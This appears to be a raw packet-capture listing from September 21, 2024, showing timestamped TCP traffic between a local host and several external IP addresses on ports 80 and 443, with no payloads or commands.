Sep 21, 2024 14:48:09.938169003 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938177109 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938183069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938196898 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938199043 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938210011 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938220978 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938225985 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938231945 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938245058 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938260078 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938261986 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938273907 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938278913 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938286066 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938298941 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938311100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938322067 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938333988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938338041 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938345909 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938357115 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938381910 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938397884 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938934088 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938946009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938956976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938967943 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938978910 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938983917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938991070 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.939002991 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.939011097 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.939019918 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.939064980 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.939081907 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941577911 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941612005 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941622019 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941663027 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941675901 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941693068 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941720009 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941752911 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941764116 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941775084 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941787004 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941793919 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941800117 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941883087 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941883087 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941931963 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941943884 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941956043 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941967964 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941977024 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.941982031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.941994905 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942002058 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942008972 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942023993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942039967 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942078114 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942089081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942101955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942117929 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942142010 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942262888 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942274094 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942286968 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942306995 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942337036 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942342997 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942359924 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942373037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942384005 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942389011 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942411900 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942433119 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942461014 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942471981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942482948 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942506075 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942514896 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942519903 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942528963 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942539930 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942557096 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942579985 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942698002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942708969 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942718983 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942729950 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942742109 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942745924 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942754984 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942763090 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942769051 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942781925 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942809105 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942817926 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942857981 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942890882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942931890 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.942944050 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942955971 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942965984 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.942981958 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.943000078 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.943043947 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.943057060 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.943073034 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.943083048 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.943084002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.943109035 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.943135977 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.959917068 CEST	80	49723	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.959969997 CEST	49723	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.960323095 CEST	80	49723	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.960408926 CEST	49723	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.960408926 CEST	49723	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.960830927 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.960870981 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.960928917 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.961225033 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.961236954 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.965316057 CEST	80	49723	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.966295958 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966352940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966362000 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966367006 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966418028 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966432095 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966437101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966449976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966460943 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966470957 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966473103 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966484070 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966495991 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966499090 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966538906 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966567993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966579914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966590881 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966607094 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966634035 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966720104 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966731071 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966742992 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966754913 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966763973 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966768980 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966775894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966782093 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966794014 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966795921 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966829062 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966856956 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966871023 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966881037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966886044 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966892004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.966896057 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.966979027 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.970685959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970696926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970706940 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970758915 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.970766068 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970777035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970789909 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970801115 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.970801115 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970813036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970833063 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.970863104 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.970886946 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970897913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970911980 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970922947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970927954 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.970927954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.970956087 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.970988989 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974231958 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974261045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974282980 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974287033 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974297047 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974308968 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974313021 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974320889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974339962 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974344015 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974353075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974363089 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974366903 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974375010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974385023 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974390030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974412918 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974441051 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974463940 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974481106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974493027 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974504948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974508047 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974520922 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974544048 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974576950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974589109 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974600077 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974611998 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974622011 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974626064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974638939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974653006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974684954 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974715948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974728107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974740028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974752903 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974757910 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974764109 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974780083 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974786997 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974822044 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974859953 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974872112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974884987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974903107 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974930048 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974937916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974950075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974961042 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974978924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.974992037 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.974992990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975008011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975022078 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975033998 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975065947 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975096941 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975120068 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975131989 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975140095 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975142956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975147963 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975156069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975167036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975169897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975183010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975212097 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975245953 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975374937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975397110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975409031 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975414991 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975420952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975442886 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975454092 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975455999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975469112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975478888 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975480080 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975493908 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975505114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975507975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975517035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975528955 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975541115 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975542068 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975553036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975562096 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975565910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975572109 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975600958 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975626945 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975785017 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975800991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975812912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975817919 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975824118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975836039 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975841999 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975864887 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975898027 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975925922 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975938082 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975949049 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975960970 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975971937 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.975972891 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.975986004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976001024 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976018906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976041079 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976063967 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976074934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976087093 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976104021 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976119041 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976140022 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976218939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976229906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976241112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976253033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976259947 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976264954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976274967 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976278067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976290941 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976298094 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976317883 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976341963 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976376057 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976387978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976398945 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976403952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976409912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976440907 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976469994 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976548910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976562023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976572990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976584911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976593971 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976596117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976609945 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976614952 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976619959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976630926 CEST	80	49711	147.45.44.104	192.168.2.9
